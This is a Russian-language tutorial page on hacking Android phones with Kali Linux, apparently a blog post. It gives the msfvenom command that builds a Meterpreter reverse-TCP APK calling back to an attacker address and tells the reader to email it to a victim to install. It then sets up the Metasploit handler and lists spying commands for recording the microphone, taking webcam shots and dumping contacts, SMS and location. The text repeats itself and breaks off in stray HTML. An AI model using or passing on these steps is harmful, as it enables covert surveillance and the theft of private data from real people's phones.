Взлом android с помощью Kali Linux


Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией  утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.

2. Установите payload и создайте всплывающее окно пользователя вот этой командой:

(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.

Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).

3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.

4. Запустите metasploit framework следующей командой

5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:

Запускается драйвер Payload……..

 

6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.

7. Воспользуйтесь следующими командами просмотра:

  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate

Что делать, если вылетает ошибка парсинга:

Для исправления этой ошибки загрузите signapk

После чего выполните следующие операции:

  1. Откройте папку «Signapk» и запустите расширение «cmd».
  2. <li style=\»box-sizing: border-box; padding: 2px 0px; co

    Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией  утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

    Установка и использование msfvenom payload:

    1. Запустите kali и откройте панель управления.

    2. Установите payload и создайте всплывающее окно пользователя вот этой командой:

    root@kali:# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk

    (Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

    Файл apk сохранен в базовую папку.

    Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).

    3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.

    4. Запустите metasploit framework следующей командой

    root@kali:# msfconsole

    5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:

    msf> usemulti/handler
    msf exploit(handler)> set payload android/meterpreter/reverse_tcp
    msf exploit(handler)> set LHOST192.168.0.110
    msf exploit(handler)> set LPORT4444

     

    msf exploit(handler)> exploit
     

    Запускается драйвер Payload……..

     

    6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.

    7. Воспользуйтесь следующими командами просмотра:

    • record_mic
    • webcam_snap
    • webcam_stream
    • dump_contacts
    • dump_sms
    • geolocate

    Что делать, если вылетает ошибка парсинга:

     

    Error fixing(incase you get PARSE ERROR)
     

    Для исправления этой ошибки загрузите signapk

    После чего выполните следующие операции:

    1. Откройте папку «Signapk» и запустите расширение «cmd».
    2.  

Добавить комментарий